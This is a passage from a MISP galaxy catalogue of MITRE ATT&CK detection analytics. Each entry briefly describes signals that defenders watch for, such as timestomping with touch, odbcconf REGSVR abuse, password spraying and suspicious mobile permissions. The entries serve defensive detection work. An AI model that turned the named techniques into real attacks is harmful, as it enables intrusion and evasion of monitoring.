UUID 5012d2b2-bd36-431c-91d3-4c10b7d3a9d6 which can be used as unique global reference for Analytic 1572 - AN1572 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1572
mitre_platforms ['Linux']

Analytic 1257 - AN1257

VMCI (Virtual Machine Communication Interface) traffic between guest and host, or between VMs, originating from non-management tools or unauthorized binaries.

Internal MISP references

UUID cae917e6-7542-41d0-8b03-ad2b7ab1eb01 which can be used as unique global reference for Analytic 1257 - AN1257 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1257
mitre_platforms ['ESXi']

Analytic 1275 - AN1275

High volume of failed logon attempts followed by a successful one from a suspicious user, host, or timeframe

Internal MISP references

UUID db50537c-9234-4350-9bf0-838d4cffbd34 which can be used as unique global reference for Analytic 1275 - AN1275 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1275
mitre_platforms ['Windows']

Analytic 1527 - AN1527

Detects creation or modification of Windows Services through command-line tools (e.g., sc.exe, powershell.exe), Registry key changes under HKLM\System\CurrentControlSet\Services, and service execution under SYSTEM with unsigned or anomalous binary paths. Detects privilege escalation via driver installation or CreateServiceW usage. Correlates parent-child lineage, startup behavior, and rare service names.

Internal MISP references

UUID ffaa281c-dd99-486d-bc7f-225580f784f4 which can be used as unique global reference for Analytic 1527 - AN1527 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1527
mitre_platforms ['Windows']

Analytic 1725 - AN1725

Application vetting services can detect certificate pinning by examining an application’s network_security_config.xml file, although this behavior can be benign.

Internal MISP references

UUID 05191336-6d06-41f7-babb-5d079e4168ae which can be used as unique global reference for Analytic 1725 - AN1725 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1725
mitre_platforms ['Android']

Analytic 1752 - AN1752

Application vetting services can look for applications requesting the android.permission.BIND_ACCESSIBILITY_SERVICE permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions. On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard.

Internal MISP references

UUID 7f8717e8-fea8-42db-b60c-c64375630685 which can be used as unique global reference for Analytic 1752 - AN1752 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1752
mitre_platforms ['iOS']

Analytic 1258 - AN1258

Non-standard port/protocol pairings or low-entropy ICMP traffic resembling tunneling patterns (e.g., fixed-size pings with delays).

Internal MISP references

UUID 688ed638-d3ba-47dc-baa7-16b16a9fe9c8 which can be used as unique global reference for Analytic 1258 - AN1258 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1258
mitre_platforms ['Network Devices']

Analytic 1285 - AN1285

Use of known default service accounts or root-level cloud accounts performing authentication or changes to IAM policy.

Internal MISP references

UUID a8ed4e86-c79a-40db-84e5-1b4cf0e917d3 which can be used as unique global reference for Analytic 1285 - AN1285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1285
mitre_platforms ['Identity Provider']

Analytic 1582 - AN1582

Detects use of built-in SaaS sharing mechanisms to transfer ownership or share access of critical data to external tenants or untrusted users through API calls or link generation features.

Internal MISP references

UUID d1ef9a86-7781-4b9e-9178-c2e5b1782c1f which can be used as unique global reference for Analytic 1582 - AN1582 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1582
mitre_platforms ['SaaS']

Analytic 1528 - AN1528

Detects the creation or execution of padded binary files (e.g., large size but minimal legitimate content) followed by process execution or lateral movement from the host.

Internal MISP references

UUID f9079cb0-76ff-4b4a-a73c-4f6572e7eef5 which can be used as unique global reference for Analytic 1528 - AN1528 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1528
mitre_platforms ['Windows']

Analytic 1852 - AN1852

Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.

Internal MISP references

UUID 739bd746-e98b-45cb-8bc6-3c8876745b4a which can be used as unique global reference for Analytic 1852 - AN1852 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1852
mitre_platforms ['iOS']

Analytic 1825 - AN1825

The user can view and manage installed third-party keyboards. Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.

Internal MISP references

UUID 9b036696-9e1e-42b9-9bfd-3ae785e7e10e which can be used as unique global reference for Analytic 1825 - AN1825 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1825
mitre_platforms ['Android']

Analytic 1592 - AN1592

Modification of Thunderbird message filters file or execution of CLI tools (e.g., formail/procmail) that alter .forward behavior.

Internal MISP references

UUID 22e6f5f4-e4cc-449c-9dba-280788935ce5 which can be used as unique global reference for Analytic 1592 - AN1592 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1592
mitre_platforms ['Linux']

Analytic 1952 - AN1952

Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3d01d29d-30f1-4b3b-bf04-54aca340a8eb which can be used as unique global reference for Analytic 1952 - AN1952 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1952
mitre_platforms ['PRE']

Analytic 1529 - AN1529

Detects abnormal creation of binary files with significant size that are subsequently executed or accessed by non-standard users.

Internal MISP references

UUID 5523b4ab-42b1-480a-854b-819879905f8d which can be used as unique global reference for Analytic 1529 - AN1529 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1529
mitre_platforms ['Linux']

Analytic 1259 - AN1259

Adversary modifies Active Directory domain trust settings via netdom, nltest, or PowerShell to add new domain trust or alter federation. Modifications occur in AD object attributes like trustDirection, trustType, trustAttributes, often paired with SeEnableDelegationPrivilege or certificate injection.

Internal MISP references

UUID c84ed29d-c0bf-465c-9e4a-7685cd4ff444 which can be used as unique global reference for Analytic 1259 - AN1259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1259
mitre_platforms ['Windows']

Analytic 1295 - AN1295

Detection of binaries spawning encrypted sessions using OpenSSL or curl to external services with mismatched ports/protocols. Identifies behavior where internal services simulate trusted cloud service traffic patterns.

Internal MISP references

UUID d27a6df2-b2df-443e-8e01-c90243465ceb which can be used as unique global reference for Analytic 1295 - AN1295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1295
mitre_platforms ['Linux']

Analytic 1626 - AN1626

Detects attempts to modify file timestamps via API usage (e.g., SetFileTime), CLI tools (e.g., w32tm, PowerShell), or double-timestomp behavior where $SI and $FN timestamps are mismatched or reverted.

Internal MISP references

UUID 475a8817-1ace-4bef-baaa-0f56979eb85a which can be used as unique global reference for Analytic 1626 - AN1626 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1626
mitre_platforms ['Windows']

Analytic 1266 - AN1266

Multiple sign-in failures against cloud-based applications using username/password combinations leaked from unrelated domains

Internal MISP references

UUID cfff571f-eb6b-41e2-a447-f69bc07aa77a which can be used as unique global reference for Analytic 1266 - AN1266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1266
mitre_platforms ['SaaS']

Analytic 1662 - AN1662

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID 155b0dfd-15d5-45bd-a8c4-249adc52f20d which can be used as unique global reference for Analytic 1662 - AN1662 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1662
mitre_platforms ['iOS']

Analytic 1267 - AN1267

Router/firewall/syslog logs showing authentication failures with unique usernames and reused credentials from same source IP

Internal MISP references

UUID 4a930e8d-75eb-469d-82d8-1e1d5764a6d4 which can be used as unique global reference for Analytic 1267 - AN1267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1267
mitre_platforms ['Network Devices']

Analytic 1627 - AN1627

Detects use of timestamp-altering commands like touch -a -m -t or touch -r, particularly when executed by unusual users or in suspicious directories.

Internal MISP references

UUID 632f7aef-f848-4147-95fa-2052bd373576 which can be used as unique global reference for Analytic 1627 - AN1627 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1627
mitre_platforms ['Linux']

Analytic 1276 - AN1276

Multiple authentication failures for valid or invalid users followed by success from same IP/user

Internal MISP references

UUID cba73580-034b-4cdd-84a2-22704d520e9c which can be used as unique global reference for Analytic 1276 - AN1276 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1276
mitre_platforms ['Linux']

Analytic 1762 - AN1762

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 1f3c9114-ac86-4c1f-bb64-fb94d65ac78c which can be used as unique global reference for Analytic 1762 - AN1762 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1762
mitre_platforms ['Android']

Analytic 1672 - AN1672

Exfiltration Over C2 Channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 413bdb56-913d-42e0-978e-5a48c60f562e which can be used as unique global reference for Analytic 1672 - AN1672 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1672
mitre_platforms ['iOS']

Analytic 1726 - AN1726

Application vetting services can detect certificate pinning by examining an application’s network_security_config.xml file, although this behavior can be benign.

Internal MISP references

UUID 93a35555-f71e-4230-9f2a-529a539e8612 which can be used as unique global reference for Analytic 1726 - AN1726 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1726
mitre_platforms ['iOS']

Analytic 1628 - AN1628

Detects timestamp changes using touch, SetFile, or direct metadata tampering (e.g., xattr manipulation) from Terminal, scripts, or low-level APIs.

Internal MISP references

UUID 097ce8cb-9a38-4c8a-836c-cee15ccdf258 which can be used as unique global reference for Analytic 1628 - AN1628 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1628
mitre_platforms ['macOS']

Analytic 1268 - AN1268

Credential stuffing attempts against Kubernetes API or containerized login shells using stolen or leaked user credentials

Internal MISP references

UUID 23c7fff8-de08-49dd-a101-0c35ad40bd7e which can be used as unique global reference for Analytic 1268 - AN1268 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1268
mitre_platforms ['Containers']

Analytic 1286 - AN1286

Abuse of system-generated or default privileged accounts such as 'root' or 'vpxuser' logging into ESXi hosts.

Internal MISP references

UUID 96fe3582-b1a3-40e4-9e9d-bab764f2af7e which can be used as unique global reference for Analytic 1286 - AN1286 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1286
mitre_platforms ['ESXi']

Analytic 1826 - AN1826

The user can view and manage installed third-party keyboards. Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.

Internal MISP references

UUID 7179bc7d-a2be-4ded-8c4f-88ec8f73e613 which can be used as unique global reference for Analytic 1826 - AN1826 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1826
mitre_platforms ['iOS']

Analytic 1682 - AN1682

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID a16c57b3-6a4c-4b15-92e9-d2d29f5b7d69 which can be used as unique global reference for Analytic 1682 - AN1682 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1682
mitre_platforms ['iOS']

Analytic 1269 - AN1269

Use of leaked credential pairs against Outlook Web Access (OWA), Microsoft 365, or Exchange from a single client IP with multiple failures

Internal MISP references

UUID 1b3bbeab-2000-47d6-88f9-8ed519f9bed6 which can be used as unique global reference for Analytic 1269 - AN1269 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1269
mitre_platforms ['Office Suite']

Analytic 1629 - AN1629

Detects abuse of busybox commands (e.g., touch) or log timestamp tampering during backdoor persistence or evasion.

Internal MISP references

UUID 1c3cb010-1c22-40c8-92d3-52e31353ad92 which can be used as unique global reference for Analytic 1629 - AN1629 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1629
mitre_platforms ['ESXi']

Analytic 1296 - AN1296

Unsigned or suspicious applications initiating network traffic claiming to be browser, mail, or cloud clients. Detects impersonation via TLS fingerprint and User-Agent string deviation.

Internal MISP references

UUID a4119120-396e-4993-8f9d-bc7b5fc94e7e which can be used as unique global reference for Analytic 1296 - AN1296 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1296
mitre_platforms ['macOS']

Analytic 1962 - AN1962

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID c0195ab2-3c4e-41ce-a1e4-7e58118abeb4 which can be used as unique global reference for Analytic 1962 - AN1962 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1962
mitre_platforms ['PRE']

Analytic 1692 - AN1692

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID c956f269-d282-4c68-afc6-ca68d8532ab6 which can be used as unique global reference for Analytic 1692 - AN1692 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1692
mitre_platforms ['iOS']

Analytic 1277 - AN1277

Password spraying or brute force attempts across user pool within short time intervals

Internal MISP references

UUID 72bf9819-b0b5-43ab-9c2d-195abe8165b8 which can be used as unique global reference for Analytic 1277 - AN1277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1277
mitre_platforms ['Identity Provider']

Analytic 1727 - AN1727

Application vetting services can detect which broadcast intents an application registers for and which permissions it requests.

Internal MISP references

UUID 0d22c60c-fd0b-47f8-abe4-2d661a73c653 which can be used as unique global reference for Analytic 1727 - AN1727 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1727
mitre_platforms ['Android']

Analytic 1772 - AN1772

In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)

In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators) Android applications using the RECORD_AUDIO permission and iOS applications using RequestRecordPermission should be carefully reviewed and monitored. If the CAPTURE_AUDIO_OUTPUT permission is found in a third-party Android application, the application should be heavily scrutinized.

In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary.

Internal MISP references

UUID d942e493-32eb-4302-890b-7729f63b7202 which can be used as unique global reference for Analytic 1772 - AN1772 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1772
mitre_platforms ['Android']

Analytic 1287 - AN1287

Login activity from default admin credentials (e.g., 'admin', 'cisco') on routers, firewalls, and switches.

Internal MISP references

UUID 305b6a70-6d5b-4b32-a40b-ae0cae342e62 which can be used as unique global reference for Analytic 1287 - AN1287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1287
mitre_platforms ['Network Devices']

Analytic 1278 - AN1278

Multiple failed authentications in unified logs (e.g., loginwindow or sshd)

Internal MISP references

UUID b31fc018-6fbc-4de7-9bf2-f545b5f8f0c2 which can be used as unique global reference for Analytic 1278 - AN1278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1278
mitre_platforms ['macOS']

Analytic 1728 - AN1728

Application vetting services can detect unnecessary and potentially abused location permissions. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. Application vetting services can detect unnecessary and potentially abused API calls. The user can review which applications have location permissions in the operating system’s settings menu.

Internal MISP references

UUID 9b4be141-9743-4113-a5f6-2d1a019b0eeb which can be used as unique global reference for Analytic 1728 - AN1728 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1728
mitre_platforms ['Android']

Analytic 1827 - AN1827

Many properly configured firewalls may also naturally block command and control traffic over non-standard ports. Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection.

Internal MISP references

UUID b6ef77d6-cc8b-478c-b7f8-7767bbb58960 which can be used as unique global reference for Analytic 1827 - AN1827 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1827
mitre_platforms ['Android']

Analytic 1782 - AN1782

Application vetting services could look for android.permission.READ_CONTACTS in an Android application’s manifest, or NSContactsUsageDescription in an iOS application’s Info.plist file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID e0ee0af8-96f8-4baf-b0f2-63d4b49938f2 which can be used as unique global reference for Analytic 1782 - AN1782 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1782
mitre_platforms ['Android']

Analytic 1297 - AN1297

ESXi hosts initiating connections from non-standard daemons mimicking HTTP/HTTPS or SNMP traffic, but with irregular payload formats or expired/unsigned TLS certificates.

Internal MISP references

UUID 8307d1d4-4f50-481b-9126-3b145fd68a73 which can be used as unique global reference for Analytic 1297 - AN1297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1297
mitre_platforms ['ESXi']

Analytic 1972 - AN1972

Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as Web Protocols or Asymmetric Cryptography.

Internal MISP references

UUID a05f564d-365c-46ce-ab98-ba377aa3b660 which can be used as unique global reference for Analytic 1972 - AN1972 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1972
mitre_platforms ['PRE']

Analytic 1279 - AN1279

Excessive login attempts followed by success from SaaS apps like O365, Dropbox, etc.

Internal MISP references

UUID a1436a64-ffc4-4e39-a7c8-140e78336ffa which can be used as unique global reference for Analytic 1279 - AN1279 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1279
mitre_platforms ['SaaS']

Analytic 1792 - AN1792

Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID 07b782b2-7e86-424a-9395-0a862d9b25c3 which can be used as unique global reference for Analytic 1792 - AN1792 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1792
mitre_platforms ['iOS']

Analytic 1729 - AN1729

Application vetting services can detect unnecessary and potentially abused location permissions. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. Application vetting services can detect unnecessary and potentially abused API calls. The user can review which applications have location permissions in the operating system’s settings menu.

Internal MISP references

UUID 2f2ed160-9093-4b1f-b781-8660552bf1e5 which can be used as unique global reference for Analytic 1729 - AN1729 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1729
mitre_platforms ['iOS']

Analytic 1288 - AN1288

Execution of Microsoft-signed scripts (e.g., pubprn.vbs, installutil.exe, wscript.exe, cscript.exe) used to proxy execution of untrusted or external binaries. Behavior is detected through command-line process lineage, child process spawning, and unsigned payload execution from signed parent.

Internal MISP references

UUID 84e969fd-a0ee-425f-a7dd-ae10e170d45a which can be used as unique global reference for Analytic 1288 - AN1288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1288
mitre_platforms ['Windows']

Analytic 1828 - AN1828

Many properly configured firewalls may also naturally block command and control traffic over non-standard ports. Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection.

Internal MISP references

UUID 7c96d701-391d-4904-b6ba-941344aaf059 which can be used as unique global reference for Analytic 1828 - AN1828 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1828
mitre_platforms ['iOS']

Analytic 1289 - AN1289

Detects thread local storage (TLS) callback injection by monitoring memory modifications to PE headers and TLS directory structures during or after process hollowing events, followed by anomalous thread behavior prior to main entry point execution.

Internal MISP references

UUID 44500eb7-01f2-4cab-8b76-1227bb48e13e which can be used as unique global reference for Analytic 1289 - AN1289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1289
mitre_platforms ['Windows']

Analytic 1982 - AN1982

Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal capabilities that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020)

Internal MISP references

UUID 5697a257-0888-4fd5-84fd-756f6fa67690 which can be used as unique global reference for Analytic 1982 - AN1982 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1982
mitre_platforms ['PRE']

Analytic 1298 - AN1298

Detects adversary tampering of shared directories via file drops (e.g., malicious LNK, EXE, VBS) followed by user execution or suspicious network activity.

Internal MISP references

UUID a0554596-7100-4f8b-a4dd-165f528fe6a1 which can be used as unique global reference for Analytic 1298 - AN1298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1298
mitre_platforms ['Windows']

Analytic 1829 - AN1829

Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 07c399a0-e5ad-462d-99b9-f51ce8aa5061 which can be used as unique global reference for Analytic 1829 - AN1829 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1829
mitre_platforms ['Android']

Analytic 1992 - AN1992

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3ee2fdaa-358a-4f65-9d15-c9096628bc7e which can be used as unique global reference for Analytic 1992 - AN1992 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1992
mitre_platforms ['PRE']

Analytic 1299 - AN1299

Detects script or binary modification within shared NFS/SMB directories followed by process execution from those paths.

Internal MISP references

UUID 7518f788-43dd-440a-955c-870cdb7dea26 which can be used as unique global reference for Analytic 1299 - AN1299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1299
mitre_platforms ['Linux']

Analytic 1333 - AN1333

Use unified logs to identify processes issuing repeated DNS queries where the resolved IP addresses change frequently within very short TTL values. Correlate with outbound network traffic to validate C2-like patterns.

Internal MISP references

UUID 22d28e80-ecae-4fa4-8901-ef9125c99e9f which can be used as unique global reference for Analytic 1333 - AN1333 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1333
mitre_platforms ['macOS']

Analytic 1433 - AN1433

Detection focuses on unauthorized manipulation of .NET AppDomainManager behavior. Defenders may observe suspicious creation of new AppDomains within trusted processes, anomalous loading of assemblies via non-standard configuration files, or registry/environment variable changes redirecting AppDomainManager to malicious assemblies. Correlated events include config file tampering, new process creation of .NET host processes (e.g., w3wp.exe, powershell.exe) with modified runtime parameters, and module loads of unusual or unsigned .NET DLLs.

Internal MISP references

UUID aa3484d0-d7ae-40e2-8a44-6b963883a35d which can be used as unique global reference for Analytic 1433 - AN1433 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1433
mitre_platforms ['Windows']

Analytic 1343 - AN1343

SaaS applications receiving authentication failures for dozens of accounts using same password or login signature

Internal MISP references

UUID c4a0d95a-2dfc-4b03-830e-d0dafca0be6f which can be used as unique global reference for Analytic 1343 - AN1343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1343
mitre_platforms ['SaaS']

Analytic 1334 - AN1334

Monitor ESXi syslog and esxcli outputs for abnormal DNS resolver behavior, such as frequent domain-to-IP changes or unauthorized modifications of DNS settings used by management agents. Correlate domain lookups with short TTL values.

Internal MISP references

UUID f9534b4a-57ef-40a0-801a-d56a217304f0 which can be used as unique global reference for Analytic 1334 - AN1334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1334
mitre_platforms ['ESXi']

Analytic 1533 - AN1533

Observation of blueutil/networksetup commands or low-level APIs toggling Bluetooth or initiating transfers, especially if paired with recent large file read activity by non-GUI processes.

Internal MISP references

UUID 2f6dd4a5-b0cc-4c13-abb8-e2d747d591b2 which can be used as unique global reference for Analytic 1533 - AN1533 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1533
mitre_platforms ['macOS']

Analytic 1335 - AN1335

Identifies abuse of odbcconf.exe to execute malicious DLLs using the REGSVR command flag. Behavior chain: (1) Process creation of odbcconf.exe with /REGSVR or /A {REGSVR ...} arguments → (2) DLL load by odbcconf.exe of non-standard or unsigned modules → (3) Optional follow-on process creation or network activity from loaded DLL.

Internal MISP references

UUID 6c0a2e08-debd-46e6-bb5f-5159ad8f12ad which can be used as unique global reference for Analytic 1335 - AN1335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1335
mitre_platforms ['Windows']

Analytic 1353 - AN1353

Suspicious enumeration of attached peripherals via WMI, PowerShell, or low-level API calls potentially chained with removable device interactions.

Internal MISP references

UUID a986c8fd-6779-4769-895a-e6d167d9f1a9 which can be used as unique global reference for Analytic 1353 - AN1353 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1353
mitre_platforms ['Windows']

Analytic 1336 - AN1336

A high volume of authentication failures using a single password (or small set) across many different user accounts within a defined time window

Internal MISP references

UUID 5ef73ed0-313e-4b9b-b616-8c2d02f4151a which can be used as unique global reference for Analytic 1336 - AN1336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1336
mitre_platforms ['Windows']

Analytic 1363 - AN1363

Monitor unified logs for access to payment applications, browser plug-ins, or Apple Pay services from non-standard processes. Detect anomalous use of Automator scripts or keychain extraction targeting financial account credentials.

Internal MISP references

UUID ce3ebda8-d47e-4730-a1f4-3366d33a98ab which can be used as unique global reference for Analytic 1363 - AN1363 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1363
mitre_platforms ['macOS']

Analytic 1633 - AN1633

Detects exploitation attempts targeting defensive security software or OS services. Defender observation includes abnormal process behavior (e.g., AV or EDR crashing unexpectedly), unsigned/untrusted modules loaded into defensive processes, or privilege escalation from security agent services. Multi-event correlation ties exploitation attempts to subsequent evasive behavior like service termination or missing logs.

Internal MISP references

UUID e5b0fcab-05e5-4687-a1a9-dd382a19980b which can be used as unique global reference for Analytic 1633 - AN1633 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1633
mitre_platforms ['Windows']

Analytic 1337 - AN1337

Authentication failures across different accounts using a repeated or similar password via SSH or PAM stack within a short window

Internal MISP references

UUID 2b751817-3de2-4388-b8b9-d43b5ecda671 which can be used as unique global reference for Analytic 1337 - AN1337 in MISP communities and other software using the MISP galaxy

